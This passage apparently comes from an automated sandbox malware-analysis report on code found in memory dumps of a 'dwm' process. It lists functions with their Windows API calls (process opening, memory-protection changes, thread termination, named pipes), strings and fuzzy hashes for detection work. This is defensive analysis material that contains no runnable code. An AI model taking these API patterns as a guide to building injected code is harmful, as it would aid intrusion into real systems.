Instruction Fuzzy Hash: CC115E3020064471FA64A7B177567A921727BC77F4F144B2AB936577E7DEACC6128E00

Function 000001D15B08199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 000001D15B0819C2
K32GetModuleFileNameExW.KERNEL32 ref: 000001D15B0819E0
PathFindFileNameW.SHLWAPI ref: 000001D15B0819EF
lstrlenW.KERNEL32 ref: 000001D15B0819FB
StrCpyW.SHLWAPI ref: 000001D15B081A0E
CloseHandle.KERNEL32 ref: 000001D15B081A1C

Memory Dump Source

Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
Instruction ID: 19413853371ee40f0acb598bfc187d791024feb5b507f58481876cc3a84d18fc
Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
Instruction Fuzzy Hash: 23013931300A40A2EB109B92B55839963A1BB89BC0F584136EE5A43764DF3CC549CB00

Function 000001D15B0836C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 000001D15B0836E4
GetCurrentProcess.KERNEL32 ref: 000001D15B0836F2
VirtualProtectEx.KERNEL32 ref: 000001D15B083714
GetCurrentProcess.KERNEL32 ref: 000001D15B083732
VirtualProtectEx.KERNEL32 ref: 000001D15B083753
TerminateThread.KERNEL32 ref: 000001D15B083762

Memory Dump Source

Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
Instruction ID: f33bf445bdf7760a2af44414ff0acb1b6d5dc0e8c0c5ad2d4944180a6c244a64
Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
Instruction Fuzzy Hash: 33012975211B40B2FB249BA1FA4979A73B0BBDAB86F044726DD4907765EF3DC158CB00

Function 000001D15B088FE8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001D15B089013
_IsNonwritableInCurrentImage.LIBCMT ref: 000001D15B0890A8
RtlUnwindEx.NTDLL ref: 000001D15B0890F7

Strings

f, xrefs: 000001D15B089026
csm, xrefs: 000001D15B08908E

Memory Dump Source

Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
Instruction ID: 754820c10d7ca8ddd124baf7920741e0348059fa2688afa5986dda01262b5f6e
Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
Instruction Fuzzy Hash: 2151D132305600BAEF55EF55FA48B9937B6F386B98F109622EA4643758DB38CA40CF00

Function 000001D15B081A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 000001D15B081A60
StrCmpNIW.SHLWAPI ref: 000001D15B081A7A
lstrlenW.KERNEL32 ref: 000001D15B081A89
StrCpyW.SHLWAPI ref: 000001D15B081A9E

Strings

\\?\, xrefs: 000001D15B081A6E

Memory Dump Source

Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
Instruction ID: b248dc186e862b72aa04f1c3a79110c4863411516b7807f5058bb7308de07f26
Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
Instruction Fuzzy Hash: 56F03C72304641B2EB608BA1FA9479A6770FB89B88F948222DA4947954DB2CC68DCF00

Function 000001D15B083044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI ref: 000001D15B083066
StrCpyW.SHLWAPI ref: 000001D15B083076
StrCatW.SHLWAPI ref: 000001D15B083082
PathCombineW.SHLWAPI ref: 000001D15B083090

Strings

\\.\pipe\, xrefs: 000001D15B08305C

Memory Dump Source

Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
Instruction ID: 80308fa6e445d17c54fd3754542c117911dec63fcc8e00f119be8a0b6a4d6c53
Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
Instruction Fuzzy Hash: 07F0FE74614B84B2EB148B93BA142996671BBCAFD0F449232EE5647B19DF2CC545CB00

Function 000001D15B08BC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 000001D15B08BCBD
GetProcAddress.KERNEL32 ref: 000001D15B08BCD3
FreeLibrary.KERNEL32 ref: 000001D15B08BCFA

Strings

mscoree.dll, xrefs: 000001D15B08BCB4
CorExitProcess, xrefs: 000001D15B08BCCC

Memory Dump Source

Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
Instruction ID: a6f02728544225b0b75cad04884c10cb1fe7507b61ab630ef6c89d6b19d265e1
Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
Instruction Fuzzy Hash: 7BF06D71311B04B1FB109BA4F9443AA6331FBCABA1F54031ADA6A472E4DF3DC149CB00

Function 000001D15B085710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000001D15B085726

Memory Dump Source

Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 0c7f3a11ae4e5ff47235e902b7b6ce7055ed727b420134bb2449cab27e882fd8
Instruction ID: 99cdecd120db7dcc644be0e1b4533a4ecd12653dfbf529cfc5098a2342cb10e1
Opcode Fuzzy Hash: 0c7f3a11ae4e5ff47235e902b7b6ce7055ed727b420134bb2449cab27e882fd8
Instruction Fuzzy Hash: A061C836619A40E6E7608B95F65039AB7B0F7CA794F605217FA8E47BA8DB7CC540CF00

Function 000001D15B063504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 000001D15B06352C
_set_statfp.LIBCMT ref: 000001D15B063547
_set_statfp.LIBCMT ref: 000001D15B063563
_set_statfp.LIBCMT ref: 000001D15B06359F

Memory Dump Source

Source File: 0000001F.00000002.3352247572.000001D15B050000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001D15B050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1d15b050000_dwm.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
Instruction ID: f48f86ed80d069d066ec34d36e69799dd3af1955f84793d47663f46055d792f0
Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
Instruction Fuzzy Hash: A0119432A10A1131FA541DECF6423E911B07BDB3B4F78472BA966072E69A2CC8414E80

Function 000001D15B094104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 000001D15B09412C
_set_statfp.LIBCMT ref: 000001D15B094147
_set_statfp.LIBCMT ref: 000001D15B094163
_set_statfp.LIBCMT ref: 000001D15B09419F

Memory Dump Source

Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
Instruction ID: fbe41f5ff1faf2b99277303e5feda48857870959b524e1a68ad511e724295a50
Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
Instruction Fuzzy Hash: FF112432A60A5132F6F815E8F6673EE11717BEB3B4F594726A576077F68B2CC8414900

Function 000001D15B05F040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 000001D15B05F124

Strings

or copy constructor iterator', xrefs: 000001D15B05F25A, 000001D15B05F275
Tuesday, xrefs: 000001D15B05F0F4
Wednesday, xrefs: 000001D15B05F1ED

Memory Dump Source

Source File: 0000001F.00000002.3352247572.000001D15B050000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001D15B050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1d15b050000_dwm.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: Tuesday$Wednesday$or copy constructor iterator'
API String ID: 3215553584-4202648911
Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
Instruction ID: 922368ef618224816e12292326a9d68edd2fb8faa02fa7282c26e6238254bce7
Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
Instruction Fuzzy Hash: E5619F76600A4472FA659BE9F7443EA6AB1F7C3780F545B17CA0A07FE5DA3CC8418E14

Function 000001D15B08AA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 000001D15B08AA68
_CallSETranslator.LIBVCRUNTIME ref: 000001D15B08AAB7

Strings

MOC, xrefs: 000001D15B08AA7C
RCC, xrefs: 000001D15B08AA85

Memory Dump Source

Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
Instruction ID: d0bd359cdf572d08683b4c05e43caef215a8f04ca8f95a3626ba265ebac0a2bf
Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
Instruction Fuzzy Hash: C6616C33600B94AAEB20DFA5E5803DD77B0F785B98F045216EF4917BA9DB78C695CB00

Function 000001D15B05A178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001D15B05A1A0
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 000001D15B05A288

Strings

csm, xrefs: 000001D15B05A2DA
csm, xrefs: 000001D15B05A1C2

Memory Dump Source

Source File: 0000001F.00000002.3352247572.000001D15B050000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001D15B050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1d15b050000_dwm.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
Instruction ID: 3e050ea8b7b9f1a7edec3d7d2f44398ca18475a58105743dc189904dda23307b
Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
Instruction Fuzzy Hash: 6A515A32104294BAEB648BA5B64439877F0F396B98F189317EA9987FD5CB3CD491CF00

Function 000001D15B08AD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001D15B08ADA0
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 000001D15B08AE88

Strings

csm, xrefs: 000001D15B08AEDA
csm, xrefs: 000001D15B08ADC2

Memory Dump Source

Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
Instruction ID: 62f598ff6aacd50a850fecef7c22cdf53c4d33ccd05c06753bdc867c79d36198
Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
Instruction Fuzzy Hash: AD517C73100790BAEB648B95A68439977B0F796B94F144327EA8A47F96CB3CD691CF00

Function 000001D15B058405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001D15B058413
_IsNonwritableInCurrentImage.LIBCMT ref: 000001D15B0584A8

Strings

csm, xrefs: 000001D15B05848E
f, xrefs: 000001D15B058426

Memory Dump Source

Source File: 0000001F.00000002.3352247572.000001D15B050000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001D15B050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1d15b050000_dwm.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
Instruction ID: 74efb88793d3c958b5e25fe4cc73c64fa9105537162f73cc0e3f17479f0242af
Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
Instruction Fuzzy Hash: E851AC32601700BAEB14CF95F644BA937B5F396B98F648226DE4643BC8FB38D8418F04

Function 000001D15B0583E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001D15B058413
_IsNonwritableInCurrentImage.LIBCMT ref: 000001D15B0584A8

Strings

csm, xrefs: 000001D15B05848E
f, xrefs: 000001D15B058426

Memory Dump Source

Source File: 0000001F.00000002.3352247572.000001D15B050000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001D15B050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1d15b050000_dwm.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
Instruction ID: cdb61b4e60006df974bc3ca30983e9ee2d019c4ef9a9ded1b475d61ac4c759ef
Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
Instruction Fuzzy Hash: 5E314A32201740B6EB149F51F9487A977B4F782B98F558216EE5A07B84EB3CD941CF04

Function 000001D15B092058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 000001D15B0920D7
WriteFile.KERNEL32 ref: 000001D15B09239F
WriteFile.KERNEL32 ref: 000001D15B0923E5
GetLastError.KERNEL32 ref: 000001D15B09249B

Memory Dump Source

Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
Instruction ID: 14ca9d32f14e8d393051949ca84c19eeda581d793bc0e9c647315581027601bb
Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
Instruction Fuzzy Hash: 4CD1E132B14A80A9E711CFB9E6403EC3BB1F396798F148316DE5997B99DB38C516CB40

Function 000001D15B092980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32 ref: 000001D15B092A9C
GetLastError.KERNEL32 ref: 000001D15B092B27

Memory Dump Source

Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
Instruction ID: f151f3711403013ac5d398874a5e3538eda2d37d311776f91f0f77b51853f4f2
Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
Instruction Fuzzy Hash: 7791AE72700654B5F764DFA5A6803ED2BF0B786B98F14431BDE4A67A95DB3CC486CB00

Function 000001D15B087960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 000001D15B08798C
GetCurrentThreadId.KERNEL32 ref: 000001D15B08799A
GetCurrentProcessId.KERNEL32 ref: 000001D15B0879A6
QueryPerformanceCounter.KERNEL32 ref: 000001D15B0879B6

Memory Dump Source

Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
Instruction ID: 2c708fd633f2236dcf8f71320f995c7474929aee39cc862b54e74aad3447a218
Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
Instruction Fuzzy Hash: AA11EC36710F05A9EB008BA0E9553A933B4F79A758F441F26DA6D477A4DF7CC1988780

Function 000001D15B08253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000001D15B082620
StrCpyW.SHLWAPI ref: 000001D15B082639

Strings

\\.\pipe\, xrefs: 000001D15B08262B

Memory Dump Source

Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
Instruction ID: 2819aa174bf0c1d77fd6e52fad825b7ef98657248b59c8f3fe6f660c6752a391
Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
Instruction Fuzzy Hash: 4171B236200781B6E7249EA6BA543EA67B4F7CA784F544227FD0A53B89DE39C745CF00

Function 000001D15B059E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON

Download Yara Rule

APIs

_CallSETranslator.LIBVCRUNTIME ref: 000001D15B059EB7

Strings

RCC, xrefs: 000001D15B059E85
MOC, xrefs: 000001D15B059E7C

Memory Dump Source

Source File: 0000001F.00000002.3352247572.000001D15B050000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001D15B050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1d15b050000_dwm.jbxd

Similarity

API ID: CallTranslator
String ID: MOC$RCC
API String ID: 3163161869-2084237596
Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
Instruction ID: cb7ffad28ed99ff4322c2ada1ec486d651d06a8b3c0cda77b37e679ea28511c1
Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
Instruction Fuzzy Hash: E3619D33604B84AAEB20DFA5E5403DD77B0F385B88F145616EF4917B99DB38D595CB00

Function 000001D15B082330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000001D15B082416
StrCpyW.SHLWAPI ref: 000001D15B08242D

Strings

\\.\pipe\, xrefs: 000001D15B082421

Memory Dump Source

Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
Instruction ID: 866e4a9ae356574c6996f9417197924f74e437daade12466e1d18dc98b918206
Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
Instruction Fuzzy Hash: 8A51C132204781B1F664DAAAB6683EA6771F3D7780F451327EE5A03B99DA3DC6048F50

Function 000001D15B0926F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 000001D15B092807
GetLastError.KERNEL32 ref: 000001D15B092829

Strings

U, xrefs: 000001D15B0927B3

Memory Dump Source

Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
Instruction ID: f7da365366da3cfdd1df1fc3b9ac3f039b7ba75be384a60d4e677f9f9a89cabe
Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
Instruction Fuzzy Hash: 54418032615A80A6EB209F65F9443EAB7B0F7D9794F504222EE4D87798EB7CC541CB40

Function 000001D15B0894A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 000001D15B0894F0
RaiseException.KERNEL32 ref: 000001D15B089531

Strings

csm, xrefs: 000001D15B08951E

Memory Dump Source

Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
Instruction ID: 970dcdc0fb841157f279fdd2b98f9c68b6b97f8f16b6d1061b374df43ce87f51
Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
Instruction Fuzzy Hash: F5112832214B80A2EB618B15F544399B7E5FB89B94F589222EE8D07B68DF3CC551CB00

Function 000001D15B057356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON

Download Yara Rule

APIs

__std_exception_copy.LIBVCRUNTIME ref: 000001D15B05737C

Strings

ierarchy Descriptor', xrefs: 000001D15B057381
riptor at (, xrefs: 000001D15B057364

Memory Dump Source

Source File: 0000001F.00000002.3352247572.000001D15B050000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001D15B050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1d15b050000_dwm.jbxd

Similarity

API ID: __std_exception_copy
String ID: ierarchy Descriptor'$riptor at (
API String ID: 592178966-758928094
Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
Instruction ID: abd3bf4106f5a7a562ffae9154c2c9125541fd19b6c4fc251438606705749a9f
Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
Instruction Fuzzy Hash: EAE04F61650B48B0DB068F61E9402D833A4AB99B64B589222995C06351FA3CD2E9C710

Function 000001D15B0573B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON

Download Yara Rule

APIs

__std_exception_copy.LIBVCRUNTIME ref: 000001D15B0573D8

Strings

Locator', xrefs: 000001D15B0573DD
riptor at (, xrefs: 000001D15B0573C0

Memory Dump Source

Source File: 0000001F.00000002.3352247572.000001D15B050000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001D15B050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1d15b050000_dwm.jbxd

Similarity

API ID: __std_exception_copy
String ID: Locator'$riptor at (
API String ID: 592178966-4215709766
Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
Instruction ID: 46d9ac7343645900364f08d48bc95dd5ebf90c6fa4b19dce8705857ad6f7dbc0
Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
Instruction Fuzzy Hash: D3E08671611B48B0DF018F61E5402D87374F799B54F98D223CD4C06351EA3CD1E5C710

Function 000001D15B081BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001D15B081C2D
HeapAlloc.KERNEL32 ref: 000001D15B081C3B
GetProcessHeap.KERNEL32 ref: 000001D15B081C77
HeapFree.KERNEL32 ref: 000001D15B081C85

Part of subcall function 000001D15B08152C: StrCmpIW.SHLWAPI ref: 000001D15B08155D

Memory Dump Source

Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
Instruction ID: 396fbf0c2559966fce4b96abf945cfd2a0a49c48072811e974041a9544b49dcb
Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
Instruction Fuzzy Hash: EA112B35601B44A1EA549BA6A6043A977B1FBCAFC0F1842269E4D57775DF78C5428B00

Function 000001D15B081268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001D15B08126E
HeapAlloc.KERNEL32 ref: 000001D15B08127D
GetProcessHeap.KERNEL32 ref: 000001D15B081297
HeapAlloc.KERNEL32 ref: 000001D15B0812A8

Memory Dump Source

Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true

Joe Sandbox IDA Plugin
